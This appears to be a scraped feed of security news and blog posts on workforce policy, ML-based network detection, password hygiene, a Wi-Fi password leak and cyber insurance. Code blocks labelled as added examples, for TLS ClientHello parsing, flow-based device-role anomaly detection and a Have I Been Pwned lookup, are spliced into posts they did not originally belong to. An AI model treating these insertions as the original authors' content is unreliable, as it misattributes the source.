There are many barriers. There's a report titled A Pivotal Moment that includes this quote: "While we cite individual instances of visionary leadership and successful deployment of technology skill for the public interest, there was a consensus that a stubborn cycle of inadequate supply, misarticulated demand, and an inefficient marketplace stymie progress."

That quote speaks to the three places for intervention. One: the supply side. There just isn't enough talent to meet the eventual demand. This is especially acute in cybersecurity, which has a talent problem across the field. Public-interest technologists are a diverse and multidisciplinary group of people. Their backgrounds come from technology, policy, and law. We also need to foster diversity within public-interest technology; the populations using the technology must be represented in the groups that shape the technology. We need a variety of ways for people to engage in this sphere: ways people can do it on the side, for a couple of years between more traditional technology jobs, or as a full-time rewarding career. We need public-interest technology to be part of every core computer-science curriculum, with "clinics" at universities where students can get a taste of public-interest work. We need technology companies to give people sabbaticals to do this work, and then value what they've learned and done.

Two: the demand side. This is our biggest problem right now; not enough organizations understand that they need technologists doing public-interest work. We need jobs to be funded across a wide variety of NGOs. We need staff positions throughout the government: executive, legislative, and judiciary branches. President Obama's US Digital Service should be expanded and replicated; so should Code for America. We need more press organizations that perform this kind of work.

Three: the marketplace. We need job boards, conferences, and skills exchanges -- places where people on the supply side can learn about the demand.

Major foundations are starting to provide funding in this space: the Ford and MacArthur Foundations in particular, but others as well.

This problem in our field has an interesting parallel with the field of public-interest law. In the 1960s, there was no such thing as public-interest law. The field was deliberately created, funded by organizations like the Ford Foundation. They financed legal aid clinics at universities, so students could learn housing, discrimination, or immigration law. They funded fellowships at organizations like the ACLU and the NAACP. They created a world where public-interest law is valued, where all the partners at major law firms are expected to have done some public-interest work. Today, when the ACLU advertises for a staff attorney, paying one-third to one-tenth normal salary, it gets hundreds of applicants. Today, 20% of Harvard Law School graduates go into public-interest law, and the school has soul-searching seminars because that percentage is so low. Meanwhile, the percentage of computer-science graduates going into public-interest work is basically zero.

This is bigger than computer security. Technology now permeates society in a way it didn't just a couple of decades ago, and governments move too slowly to take this into account. That means technologists now are relevant to all sorts of areas that they had no traditional connection to: climate change, food safety, future of work, public health, bioengineering.

More generally, technologists need to understand the policy ramifications of their work. There's a pervasive myth in Silicon Valley that technology is politically neutral. It's not, and I hope most people reading this today know that. We built a world where programmers felt they had an inherent right to code the world as they saw fit. We were allowed to do this because, until recently, it didn't matter. Now, too many issues are being decided in an unregulated capitalist environment where significant social costs are too often not taken into account.

This is where the core issues of society lie. The defining political question of the 20th century was: "What should be governed by the state, and what should be governed by the market?" This defined the difference between East and West, and the difference between political parties within countries. The defining political question of the first half of the 21st century is: "How much of our lives should be governed by technology, and under what terms?" In the last century, economists drove public policy. In this century, it will be technologists.

The future is coming faster than our current set of policy tools can deal with. The only way to fix this is to develop a new set of policy tools with the help of technologists. We need to be in all aspects of public-interest work, from informing policy to creating tools all building the future. The world needs all of our help.

This essay previously appeared in the January/February 2019 issue of IEEE Security & Privacy. I maintain a public-interest tech resources page here.

Cybercriminals thriving on companies overlooking fundamental security requirements

IT leaders in the United States are putting business data at risk by not effectively managing employees’ passwords, according to OneLogin research. Despite the fact that 91% report they have company guidelines in place around password complexity, and 92% believe their current password protection measures and guidelines provide adequate protection for their business, the results suggest there is still a lot of work to be done. OneLogin surveyed 300 IT decision makers across the U.S. … More

The post Cybercriminals thriving on companies overlooking fundamental security requirements appeared first on Help Net Security.

60% of businesses have experienced a serious security breach in the last two years

There is an increase in security breaches and businesses still face challenges surrounding cyberattacks due to lack of IT security and operations basics. With digital transformation on the rise and technology massively outpacing policy, companies must take the lead when it comes to securing their estates. While cybersecurity has received much fanfare – with global spend predicted to exceed $1 trillion through 2021 – the biggest gaps continue to endure in plain sight. Vanson Bourne … More

The post 60% of businesses have experienced a serious security breach in the last two years appeared first on Help Net Security.

The State of Machine Learning in 2019

Here we are, almost four whole months into 2019 and machine learning and artificial intelligence are still hot topics in the security world. Or at least that was the impression I had. Our 2019 CISO Benchmark Report however, found that between 2018 and 2019, CISO interest in machine learning dropped from 77% to 67%. Similarly, interest in artificial intelligence also dropped from 74% to 66%.

Now there are a number of reasons why these values could have dropped over a year. Maybe there’s a greater lack of certainty or confidence when it comes to implementing ML. Or perhaps widespread adoption and integration into more organizations has made it less of a standout issue for CISOs. Or maybe the market for ML has finally matured to the point where we can start talking about the outcomes from ML and AI and not the tools themselves.

No matter where you stand on ML and AI, there’s still plenty to talk about when it comes to how we as an industry are currently making use of them. With that in mind, I’d like to share some thoughts on ways we need to view machine learning and artificial intelligence as well as how we need to shift the conversation around them.

More effective = less obvious

I’m still amazed by how machine learning is still a hot topic. That’s not to say it does not deserve to be an area of interest though. I am saying however, that what we should be talking about are the outcomes and capabilities it delivers. Some of you may remember when XML was such a big deal, and everyone could not stop talking about it. Fast forward to today and no one advertises that they use XML since that would just be obvious and users care more about the functionality it enables. Machine Learning will follow along the same path. In time, it will become an essential aspect of the way we approach security and become simply another background process. Once that happens, we can focus on talking about the analytical outcomes it enables.

An ensemble cast featuring machine learning

Anyone who has built an effective security analytics pipeline knows that job one is to ensure that it is resilient to active evasion. Threat actors know as much as or more than you do about the detection methods within the environments they wish to penetrate and persist in. The job of security analytics is to find the most stealthy and evasive threat actor activity in the network, and to do this, you cannot rely on a single technique. For that detection to happen, you need a diverse set of techniques, all of which complement one another. While a threat actor will be able to evade one or two of them simultaneously, they don’t stand a chance against hundreds of them! Detection in diversity!

To explain this, I would like to use the analogy of a modern bank vault. Vaults employ a diverse set of detection techniques like motion, thermal, and laser arrays; on one physical dimension or another an alarm will be tripped, and the appropriate response will ensue. We do the same in the digital world, where machine learning helps us model the timing or volumetric aspects of behavior that are statistically normal so that we can signal on outliers. This can be done all the way down at the protocol level, where models are deterministic, or all the way up to application or user behavior, which can sometimes be less deterministic. We have had years to refine these analytical techniques and have published well over 50 papers on the topic in the past 12 years.

The precision and scale of ML

So why then can’t we just keep using lists of bad things and lists of good things? Why do we need machine learning in security analytics and what unique value does it bring us? The first thing I want to say here is that we are not religious about machine learning or AI. To us, it is just another tool in the larger analytics pipeline. In fact, the most helpful analytics comes from using a bit of everything.

If you hand me a list and say, “If you ever see these patterns, let me know about it immediately!” I’m good with that. I can do that all day long and at very high speeds. But what if we are looking for something that cannot be known prior to the list-making act? What if what we are looking for cannot be seen but only inferred? The shadows of the objects but never the objects, if you will. What if we are not really sure what something is or the role it plays in the larger system (i.e., categorization and classification)? All of these questions are areas where machine learning has contributed a great deal to security analytics. Let’s point to a few examples.

The essence of Encrypted Traffic Analytics

Encryption has made what was observable in the network impossible to observe. You can argue with me on this, but mathematics is not on your side, so let’s just accept the fact that deep packet inspection is a thing of the past. We need a new strategy, and that strategy is the power of inference. Encrypted Traffic Analytics is an invention at Cisco whereby we leverage the fact that all encrypted sessions begin unencrypted and that the routers and switches can send us an “Observable Derivative.” This metadata coming from the network is a mathematical shadow of the payloads we cannot inspect directly because they are encrypted. Machine learning helps us train on these observable derivatives so that if their shape and size over time match some malicious behavior, we can bring this to your attention, all without having to deal with decryption.
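The claim that “all encrypted sessions begin unencrypted” is easy to verify for TLS: the ClientHello that opens a session is sent in the clear, so a passive sensor can read the server name (SNI), the offered cipher suites and the record size without any key material. The following is an added illustration and is not Cisco’s Encrypted Traffic Analytics code; it builds a minimal TLS 1.2 ClientHello (constructed bytes, fixed client random, layout per RFC 5246 and RFC 6066) and then parses the same metadata back out the way a sensor would.

```python
import struct
from typing import Dict, List, Optional

# Added example: the TLS ClientHello is observable metadata. Not Cisco code.
# Cipher suite codes used in the demo are real IANA values:
#   0x1301 = TLS_AES_128_GCM_SHA256, 0xC02F = TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256


def build_client_hello(server_name: str, cipher_suites: List[int]) -> bytes:
    """Construct a minimal TLS 1.2 handshake record carrying a ClientHello with SNI."""
    client_random = b"\x11" * 32  # constructed; a real client sends 32 random bytes
    host = server_name.encode("ascii")
    sni_entry = b"\x00" + struct.pack("!H", len(host)) + host        # name_type 0 = host_name
    sni_list = struct.pack("!H", len(sni_entry)) + sni_entry
    sni_ext = struct.pack("!HH", 0x0000, len(sni_list)) + sni_list    # extension 0 = server_name
    suites = b"".join(struct.pack("!H", s) for s in cipher_suites)
    body = (
        b"\x03\x03" + client_random                 # client_version 1.2, random
        + b"\x00"                                   # empty session_id
        + struct.pack("!H", len(suites)) + suites   # cipher_suites vector
        + b"\x01\x00"                               # one compression method: null
        + struct.pack("!H", len(sni_ext)) + sni_ext # extensions vector
    )
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body         # handshake type 1 = ClientHello
    return b"\x16\x03\x03" + struct.pack("!H", len(handshake)) + handshake  # record type 22


def parse_client_hello(record: bytes) -> Dict[str, object]:
    """Extract what a network sensor can see in a ClientHello without decrypting anything."""
    if len(record) < 5 or record[0] != 0x16:
        raise ValueError("not a TLS handshake record")
    rec_len = struct.unpack("!H", record[3:5])[0]
    hs = record[5:5 + rec_len]
    if len(hs) < 4 or hs[0] != 0x01:
        raise ValueError("not a ClientHello")
    pos = 4 + 2 + 32                           # handshake header, client_version, random
    sid_len = hs[pos]
    pos += 1 + sid_len
    cs_len = struct.unpack("!H", hs[pos:pos + 2])[0]
    pos += 2
    suites = [struct.unpack("!H", hs[i:i + 2])[0] for i in range(pos, pos + cs_len, 2)]
    pos += cs_len
    comp_len = hs[pos]
    pos += 1 + comp_len
    sni: Optional[str] = None
    if pos + 2 <= len(hs):                     # extensions are optional in the wire format
        ext_len = struct.unpack("!H", hs[pos:pos + 2])[0]
        pos += 2
        end = pos + ext_len
        while pos + 4 <= end:
            etype, elen = struct.unpack("!HH", hs[pos:pos + 4])
            pos += 4
            if etype == 0x0000:
                # server_name list: list length(2), name_type(1), name length(2), name
                name_len = struct.unpack("!H", hs[pos + 3:pos + 5])[0]
                sni = hs[pos + 5:pos + 5 + name_len].decode("ascii")
            pos += elen
    return {"record_length": rec_len, "sni": sni, "cipher_suites": suites}


if __name__ == "__main__":
    rec = build_client_hello("example.com", [0x1301, 0xC02F])
    print(parse_client_hello(rec))
```

Everything the parser returns is available before a single application byte is encrypted; these fields, together with the sequence of encrypted record lengths and inter-arrival times that follow, are the kind of observable derivative the post describes, and a sensor can feed them to a model while the payload stays opaque.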

Why is this printer browsing Netflix?

Sometimes we are lucky enough to know the identity and role of a user, application, or device as it interacts with systems across the network. The reality is, most days we are far from 100% on this, so machine learning can help us cluster network activity to make an assertion like, “Based on the behavior and interactions of this thing, we can call it a printer!” When you are dealing with thousands upon thousands of computers interacting with one another across your digital business, even if you had a list at some point in time, it is likely not up to date. The value of this labeling is not just that you have objects with the most accurate labels, but that you can infer suspicious behavior from a device’s trusted role. For example, if a network device is labeled a printer, it is expected to act like a printer, so its future behavior can be predicted. If one day it starts to browse Netflix or checks out some code from a repository, our software Stealthwatch generates an alert to bring it to your attention. With machine learning, you can infer from behavior what something is, or, if you already know what something is, you can predict its “normal” behavior and flag any behavior that is “not normal.”

Pattern matching versus behavioral analytics

Lists are great! Hand me a high-fidelity list and I will hand you back high-fidelity alerts generated from that list. Hand me a noisy or low-fidelity list and I will hand you back noise. The definition of machine learning by Arthur Samuel in 1959 is “field of study that gives computers the ability to learn without being explicitly programmed.” In security analytics, we can use it for just this and have analytical processes that implicitly program a list for you given the activity they observe (the telemetry they are presented). Machine learning helps us implicitly put together a list that could not have been known a priori. In security, we complement what we know with what we can infer through negation. A simple example would be, “If these are my sanctioned DNS servers and activities, then what is this other thing here?!” Logically, instead of saying something is A (or a member of set A), we are saying not-A, but that is only practical if we have already closed off the world to {A, B}: not-A is B if the set is closed. If, however, we did not close off the world to a fixed set of members, not-A could be anything in the universe, which is not helpful.
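The two ideas above, inferring a device’s role from its behavior and then alerting on departures from that role (the printer that browses Netflix), and inference through negation inside a closed world (anything on port 53 that is not a sanctioned resolver), can be shown on the same telemetry. The following is an added example, not Stealthwatch code or a Cisco model: the flow records, role prototypes and addresses (RFC 5737 test ranges) are constructed, and role assignment uses a plain Jaccard similarity instead of a trained clustering model, which is enough to show where the closed-world assumption enters.

```python
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# Added example (not Cisco/Stealthwatch code). Constructed flow telemetry:
# (source_host, destination_host, destination_port).
FLOWS: List[Tuple[str, str, int]] = [
    ("10.0.0.50", "10.0.0.21", 9100),      # workstation sends a raw print job
    ("10.0.0.51", "10.0.0.21", 631),       # workstation uses IPP on the printer
    ("10.0.0.21", "10.0.0.2", 53),         # printer resolves names via sanctioned DNS
    ("10.0.0.21", "203.0.113.10", 443),    # printer talks HTTPS to a streaming site (!)
    ("10.0.0.50", "10.0.0.2", 53),
    ("10.0.0.50", "198.51.100.7", 443),
    ("10.0.0.50", "198.51.100.7", 80),
    ("10.0.0.51", "192.0.2.53", 53),       # workstation uses an unsanctioned resolver (!)
    ("10.0.0.51", "198.51.100.7", 443),
]

Token = Tuple[str, int]   # ("in", port) = service offered, ("out", port) = service used

# Constructed role prototypes: the behaviors we expect from each role. In a real
# pipeline these would be learned clusters, not hand-written sets.
ROLE_PROTOTYPES: Dict[str, Set[Token]] = {
    "printer": {("in", 9100), ("in", 631), ("out", 53)},
    "workstation": {("out", 443), ("out", 80), ("out", 53), ("out", 445),
                    ("out", 9100), ("out", 631)},
    "dns_server": {("in", 53), ("out", 53)},
}

# Closed world for the negation rule: the only resolvers that should see port 53.
SANCTIONED_DNS: Set[str] = {"10.0.0.2"}


def build_profiles(flows: List[Tuple[str, str, int]]) -> Dict[str, Set[Token]]:
    """Summarize each internal host by the (direction, port) tokens it exhibits."""
    profiles: Dict[str, Set[Token]] = defaultdict(set)
    for src, dst, port in flows:
        profiles[src].add(("out", port))
        if dst.startswith("10."):           # constructed: 10/8 is the internal network
            profiles[dst].add(("in", port))
    return dict(profiles)


def assign_roles(profiles: Dict[str, Set[Token]]) -> Dict[str, str]:
    """Label each host with the prototype its behavior resembles most (Jaccard)."""
    def jaccard(a: Set[Token], b: Set[Token]) -> float:
        return len(a & b) / len(a | b) if (a | b) else 0.0
    return {host: max(ROLE_PROTOTYPES, key=lambda r: jaccard(p, ROLE_PROTOTYPES[r]))
            for host, p in profiles.items()}


def role_deviations(flows: List[Tuple[str, str, int]],
                    roles: Dict[str, str]) -> List[Tuple[str, str, str, int, str]]:
    """Flag flows where a labeled host does something outside its role's prototype."""
    alerts = []
    for src, dst, port in flows:
        for host, token, peer in ((src, ("out", port), dst), (dst, ("in", port), src)):
            role = roles.get(host)
            if role is not None and token not in ROLE_PROTOTYPES[role]:
                alerts.append((host, role, token[0], port, peer))
    return alerts


def unsanctioned_dns(flows: List[Tuple[str, str, int]],
                     sanctioned: Set[str]) -> List[Tuple[str, str]]:
    """Negation within a closed world: port-53 traffic is either to a sanctioned
    resolver or it is suspicious. Without the 'sanctioned' set this rule has no meaning."""
    return [(src, dst) for src, dst, port in flows if port == 53 and dst not in sanctioned]


if __name__ == "__main__":
    roles = assign_roles(build_profiles(FLOWS))
    print(roles)
    print(role_deviations(FLOWS, roles))
    print(unsanctioned_dns(FLOWS, SANCTIONED_DNS))
```

Run as written, the role assignment labels 10.0.0.21 a printer, the deviation check reports its HTTPS flow to 203.0.113.10, and the negation rule reports 10.0.0.51 talking to 192.0.2.53. Note that `role_deviations` stays quiet about external peers it has no role for; that is the open-world case the post warns about, and it is why the negation rule needs an explicit sanctioned set rather than a guess.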

Useful info for your day-to-day tasks

I had gone my entire career measuring humans as if they were machines, and now I am measuring humans as humans. We cannot forget that no matter how fancy we get with the data science, if a human in the end will need to understand and possibly act on this information, they ultimately need to understand it. I had gone my entire career thinking that the data science could explain the results, and while this is academically accurate, it is not helpful to the person who needs to understand the analytical outcome. The sense-making of the data is squarely in the domain of human understanding, and this is why the only question we want to ask is “Was this alert helpful?” Yes or no. And that’s exactly what we do with Stealthwatch. At the end of the day, we want to make sure that the person behind the console understands why an alert was triggered and whether that helped them. If the “yeses” we’ve received, scoring in the mid-90% range quarter after quarter, are any indication, then we’ve been able to help a lot of users make sense of the alerts they’re receiving and use their time more efficiently.

Conclusion

We owe a big round of applause to artificial intelligence for birthing the child we know and love, named machine learning, and all that it has contributed to security analytics over the past year. We remain pragmatic in its application, as we know that just because it is the new kid on the block, we cannot turn our backs on simple or complex lists of rules, simple statistical analysis, and any other method that has got us to where we are today.

Lucky for us, machine learning has already shown signs of playing well with its peers as we continue to find ways to improve existing security processes through pairing them with ML. It can’t solve every single problem on its own, but when it works together with the people and processes that have come before it, we get that much closer to a more secure future. And if Machine Learning is the child of AI, who then are its brothers and sisters that we have yet to explore in Security Analytics? We have some big ideas and some already in prototype state, but remember, in the end, we will ask you if it is helpful or not helpful, not all the data science mumbo jumbo!

As always, we welcome your comments below. Readers who enjoyed this blog would also benefit from viewing our library of recent Cybersecurity Reports or checking out our new Threat of the Month blog series.

50,000 companies running SAP installations open to attack via publicly released exploits

Two exploits publicly released in late April at the OPCDE security conference in Dubai could be leveraged to compromise a great number of SAP implementations, Onapsis has warned. A successful attack would allow remote, unauthenticated attackers to:

  • Perform critical business transactions on SAP systems (modify purchase orders, bypassing automatic business controls, etc.)
  • Compromise and extract critical business information
  • Delete all business application data
  • Delete traces of their actions
  • Shut the system down.

“This risk to … More

The post 50,000 companies running SAP installations open to attack via publicly released exploits appeared first on Help Net Security.

Why Isn’t GDPR Being Enforced?

Politico has a long article making the case that the lead GDPR regulator, Ireland, has too cozy a relationship with Silicon Valley tech companies to effectively regulate their privacy practices.

Despite its vows to beef up its threadbare regulatory apparatus, Ireland has a long history of catering to the very companies it is supposed to oversee, having wooed top Silicon Valley firms to the Emerald Isle with promises of low taxes, open access to top officials, and help securing funds to build glittering new headquarters.

Now, data-privacy experts and regulators in other countries alike are questioning Ireland's commitment to policing imminent privacy concerns like Facebook's reintroduction of facial recognition software and data sharing with its recently purchased subsidiary WhatsApp, and Google's sharing of information across its burgeoning number of platforms.

Protect Your Digital Life: Why Strong Passwords Matter

Over the years, our lives have become more and more digital. Think about it: 20 years ago, no one was using banking apps and social media had just barely begun coming to fruition. Now, many of us are reliant on mobile banking to pay our bills and we check our favorite social media platforms multiple times a day. Our lives exist almost entirely online with our sensitive personal data shielded by password protection — from our financials to our official documentation, personal photos and more. With so much of our personal data relying on the strength of our online passwords, it’s vital that users stay up-to-date on the latest password security practices. As we take the time to recognize World Password Day, it’s important to think about why passwords matter and how you’re safeguarding your personal information online.


Think about all of the online data you have that is password protected: your email, your social media accounts, your online banking profile, your movie and TV streaming service, the list goes on and on. If you aren’t following best practices for password security and just one of your passwords is exposed or breached, this could potentially lead to cybersecurity turmoil. For example, an Android app that helped users find and connect to free Wi-Fi hotspots recently left its database of more than 2 million network passwords exposed. While the app claimed to only share public hotspots, many were found to be home wireless networks thanks to the precise GPS location data that was also stored in the database. Now imagine that one of the victims of this password exposure utilized the same credentials for their online banking profile. If their password ended up in the wrong hands, a cybercriminal could potentially access the user’s financial data, leading to fraudulent charges or even identity theft. As you can see, creating a strong and unique password could mean the difference between keeping your online data safe and being at risk of a cyberattack.

Many people just go through the motions when creating passwords instead of taking the time to consider what exactly their credentials are protecting. World Password Day is the perfect opportunity to be diligent about revamping passwords. Check out the following tips to take your password security to the next level:

  • See if your passwords have been exposed. Go to a site such as Have I Been Pwned to see if your password(s) have been compromised in a breach. Change them if you find that your credentials may have been jeopardized.
  • Layer up your passwords. Passwords should always contain a variety of capital and lowercase letters, numbers, and symbols. Today, many systems enforce password requirements during the account set-up process to ensure password strength.
  • Choose unique passwords across all of your accounts. Many consumers utilize the same password, or variations of it, across all of their accounts. This means if a hacker discovers just one password, all personal data is suddenly at risk. Therefore, it is crucial to diversify your passcodes to ensure hackers cannot obtain access to all of your accounts at once, should one password be compromised.
  • Use a password manager. Since it can be difficult to remember multiple complex passwords, use a password manager to keep track. With password managers, you’ll only need to remember one master password in order to access the rest. Many password managers can also generate strong passwords to utilize when creating new logins.
  • Enable two or multi-factor authentication. Two or multi-factor authentication provides an extra layer of security, as it requires multiple forms of verification. This reduces the risk of successful impersonation by hackers.
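The first tip, checking whether a password has appeared in a breach, is worth looking at more closely, because the Have I Been Pwned “Pwned Passwords” service lets you do this without ever sending the password, or even its full hash, to anyone: the client sends only the first five hex characters of the password’s SHA-1 and receives every known hash suffix in that range (k-anonymity). The following is an added example, not McAfee’s or HIBP’s code. The endpoint and the `Add-Padding` request header are the real HIBP range API as documented; the sample range response is constructed and only contains the well-known hash of the string `password` plus filler entries, so the check runs offline.

```python
import hashlib
import urllib.request
from typing import Tuple

# Added example (not McAfee or HIBP code). Real API: GET {HIBP_RANGE_URL}{prefix}
# returns lines "SUFFIX:COUNT" for every known SHA-1 that starts with prefix.
HIBP_RANGE_URL = "https://api.pwnedpasswords.com/range/"


def split_sha1(password: str) -> Tuple[str, str]:
    """Return (5-char prefix, 35-char suffix) of the uppercase hex SHA-1 of the password.
    Only the prefix ever leaves the machine."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def count_in_range(suffix: str, range_body: str) -> int:
    """Look the local suffix up in a range response. Lines with count 0 are padding
    (HIBP adds them when Add-Padding is requested) and naturally count as 'not seen'."""
    for line in range_body.splitlines():
        line = line.strip()
        if ":" not in line:
            continue
        candidate, count = line.split(":", 1)
        if candidate.upper() == suffix:
            return int(count)
    return 0


def fetch_range(prefix: str) -> str:
    """Live lookup (network). Not called by the offline demo below."""
    req = urllib.request.Request(
        HIBP_RANGE_URL + prefix,
        headers={"Add-Padding": "true", "User-Agent": "password-check-example"},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8")


def is_pwned(password: str, range_lookup=fetch_range) -> int:
    """Return how often the password has been seen in breaches (0 = not found)."""
    prefix, suffix = split_sha1(password)
    return count_in_range(suffix, range_lookup(prefix))


# Constructed range response for prefix 5BAA6. The first line is the real SHA-1
# suffix of "password"; the count and the other two lines are made up, the last
# one imitating a padding entry.
CONSTRUCTED_RANGE_5BAA6 = """\
1E4C9B93F3F0682250B6CF8331B7EE68FD8:3861493
0A1B2C3D4E5F60718293A4B5C6D7E8F9A0B:12
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF:0
"""


def offline_lookup(prefix: str) -> str:
    """Stand-in for fetch_range that serves the constructed response."""
    return CONSTRUCTED_RANGE_5BAA6 if prefix == "5BAA6" else ""


if __name__ == "__main__":
    for pw in ("password", "correct-horse-battery-staple-7Qz"):
        print(pw, "->", is_pwned(pw, offline_lookup))
```

The design point is the split: `split_sha1` is the only place the password is touched, and the comparison happens locally against the returned range, so neither the password nor a hash that identifies it is disclosed. To use it for real, pass the default `fetch_range` instead of `offline_lookup`.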

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Protect Your Digital Life: Why Strong Passwords Matter appeared first on McAfee Blogs.

Open source security: The risk issue is unpatched software, not open source use

Many of the trends in open source use that have presented risk management challenges to organizations in previous years persist today. However, new data also suggest that an inflection point has been reached, with many organizations improving their ability to manage open source risk, possibly due to heightened awareness and the maturation of commercial software composition analysis solutions. The 2019 Open Source Security and Risk Analysis (OSSRA) report, produced by the Synopsys Cybersecurity Research Center … More

The post Open source security: The risk issue is unpatched software, not open source use appeared first on Help Net Security.

Supply chain attacks: Mitigation and protection

In software development, a supply chain attack is typically performed by inserting malicious code into a code dependency or third-party service integration. Unlike typical cyber attacks, supply chain attacks provide two major advantages to attackers. Firstly, a single supply chain attack can target multiple companies at once (since multiple companies use the same code dependencies and third-party scripts); as such, the potential return of investment of the attack is higher. Secondly, and unlike common cyber … More

The post Supply chain attacks: Mitigation and protection appeared first on Help Net Security.

Inside the Government Cybersecurity Landscape: Federal vs. State Level Challenges

Few would dispute the idea that an effective cybersecurity profile requires candid assessments of potential vulnerabilities. Here’s a closer look at the challenges facing the federal cybersecurity mission and the efforts of state-level agencies. Federal Though the federal government demonstrates an ongoing commitment to ramping up its cybersecurity mission with annual spending in the tens […]… Read More

The post Inside the Government Cybersecurity Landscape: Federal vs. State Level Challenges appeared first on The State of Security.

Researchers develop cybersecurity system to test for vulnerabilities in technologies that use GPS

Southwest Research Institute has developed a cybersecurity system to test for vulnerabilities in automated vehicles and other technologies that use GPS receivers for positioning, navigation and timing. “This is a legal way for us to improve the cyber resilience of autonomous vehicles by demonstrating a transmission of spoofed or manipulated GPS signals to allow for analysis of system responses,” said Victor Murray, head of SwRI’s Cyber Physical Systems Group in the Intelligent Systems Division. GPS … More

The post Researchers develop cybersecurity system to test for vulnerabilities in technologies that use GPS appeared first on Help Net Security.

As organizations continue to adopt multicloud strategies, security remains an issue

97 percent of organizations are adopting multicloud strategies for mission-critical applications and nearly two-thirds are using multiple vendors for mission-critical workloads, a Virtustream survey reveals. The study, conducted by Forrester Consulting, is based on a global survey of more than 700 cloud technology decision makers at businesses with more than 500 employees. The study examines the current state of enterprise IT strategies for cloud-based workloads and details the increasing interest and needs of IT decision … More

The post As organizations continue to adopt multicloud strategies, security remains an issue appeared first on Help Net Security.

Security and compliance obstacles among the top challenges for cloud native adoption

Cloud native adoption has become an important trend among organizations as they move to embrace and employ a combination of cloud, containers, orchestration, and microservices to keep up with customers’ expectations and needs. To discover more about the motivations and challenges of companies adopting cloud native infrastructure, the O’Reilly “How Companies Adopt and Apply Cloud Native Infrastructure” report surveyed 590 practitioners, managers and CxOs from across the globe, and found that while nearly 70 percent … More

The post Security and compliance obstacles among the top challenges for cloud native adoption appeared first on Help Net Security.

Making the most of threat intelligence with threat intelligence gateways

Even though many security professionals are still dissatisfied with threat intelligence accuracy and quality, its use as a resource for network defense is growing. According to the 2019 SANS Cyber Threat Intelligence (CTI) Survey, the percentage of organizations that either produce or consume CTI has risen from 60 to 72 percent. As it gets more broadly adopted and as more organizations seek to operationalize their TI more effectively and efficiently, they are slowly starting to … More

The post Making the most of threat intelligence with threat intelligence gateways appeared first on Help Net Security.

Hacking our way into cybersecurity for medical devices

Hospitals are filled with machines connected to the internet. With a combination of both wired and wireless connectivity, knowing and managing which devices are connected has become more complicated and, consequently, the institutions’ attack surface has expanded. When did these devices get smart? A brief timeline shows the FDA didn’t start regulating the connectivity of devices until 2005, but medical devices started to leverage software back in the ‘80s. Clinical capabilities have benefited greatly from … More

The post Hacking our way into cybersecurity for medical devices appeared first on Help Net Security.

SEC demands better disclosure for cybersecurity incidents and threats

As companies increasingly rely on networked systems and on the Internet, cybersecurity threats have grown. Companies that fall victim to a successful cyberattack incur substantial costs for remediation, including increased costs for cyber protection, lost revenues, legal costs and more. All of these costs can impact the riskiness and value of a public company’s stock. Given the frequency, magnitude and cost of cybersecurity incidents, the Securities and Exchange Commission (SEC) has stated that it is … More

The post SEC demands better disclosure for cybersecurity incidents and threats appeared first on Help Net Security.

Companies face regulatory fines and cybersecurity threats, still fail to protect sensitive data

22% of a company’s folders are accessible, on average, to every employee, according to the new report from the Varonis Data Lab, which analyzed more than 54 billion files. The report shines a light on security issues that put organizations at risk from data breaches, insider threats and crippling malware attacks. Key findings from the 2019 Global Data Risk Report include: Out-of-control permissions expose sensitive files and folders to every employee: 53% of companies had … More

The post Companies face regulatory fines and cybersecurity threats, still fail to protect sensitive data appeared first on Help Net Security.

Wi-Fi Woes: Android Hotspot App Leaves 2 Million Passwords Exposed

Logging onto a free Wi-Fi network can be tempting, especially when you’re out running errands or waiting to catch a flight at the airport. But this could have serious cybersecurity consequences. One popular Android app, which allowed anyone to search for nearby Wi-Fi networks, was recently left exposed, leaving a database containing over 2 million network passwords unprotected.

How exactly were these passwords exposed? The app, which had been downloaded by millions of users, allowed anyone to search for Wi-Fi networks in their area. The app also lets users upload their Wi-Fi network passwords from their devices to its database for others to use. When the database was left exposed and unprotected, anyone could access and download its contents. Each record in the database contained the Wi-Fi network name, its precise geolocation, its basic service set identifier, and the network password in plaintext. Because the app didn’t require users to obtain permission from the network owner, it would be quite easy for a cybercriminal to modify router settings and point unsuspecting users to malicious websites. What’s more, a threat actor could also read unencrypted traffic that goes across a wireless network, allowing them to steal passwords and private data.

Thankfully, the web host was able to take down the database containing the Wi-Fi passwords within a day of being notified. But it’s important for users to be aware of the cybersecurity implications that free or public Wi-Fi presents. Check out the following tips to help protect your data:

  • Change your Wi-Fi password. If you think your password may have been affected by this exposure, err on the side of caution and reset it. Be sure to make your new password complex and unique.
  • Keep your network password private. Wi-Fi networks could be susceptible to a number of threats if their passwords are left in the wrong hands. Only share your passwords with family, friends, and those you trust, and never upload your password to a public database for strangers to use.
  • Safeguard your online privacy. Use a security solution like McAfee Safe Connect to encrypt your online activity, protect your privacy by hiding your IP address, and better defend against cybercriminals.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Wi-Fi Woes: Android Hotspot App Leaves 2 Million Passwords Exposed appeared first on McAfee Blogs.

What This Report on Cyber Risk Gets Wrong

The Marsh brokerage unit of Marsh and McLennan recently announced a new evaluation process called Cyber Catalyst designed to determine the usefulness of enterprise cyber risk tools.

The goal of the new offering is to identify and implement industry-wide standards to help cyber insurance policyholders make more informed decisions about cyber-related products and services; basically, what works and what doesn’t. Other major insurers participating in Cyber Catalyst include Allianz, AXA XL, AXIS, Beazley, CFC, and Sompo International.

While this collaboration between insurance companies is unusual, it’s not entirely surprising. Cyber insurance is a $4 billion market globally. While it’s difficult to accurately gauge how many hacking attempts were successfully foiled by the products targeted here, data breaches and cyber attacks on businesses continue to increase in frequency and severity. The 2019 World Economic Forum’s Global Risks Report ranks “massive data fraud and theft” as the fourth greatest global risk, followed by “cyber-attacks” in the fifth slot.

Meanwhile, cybersecurity products and vendors have been, to be charitable, a mixed bag.

Good in Theory

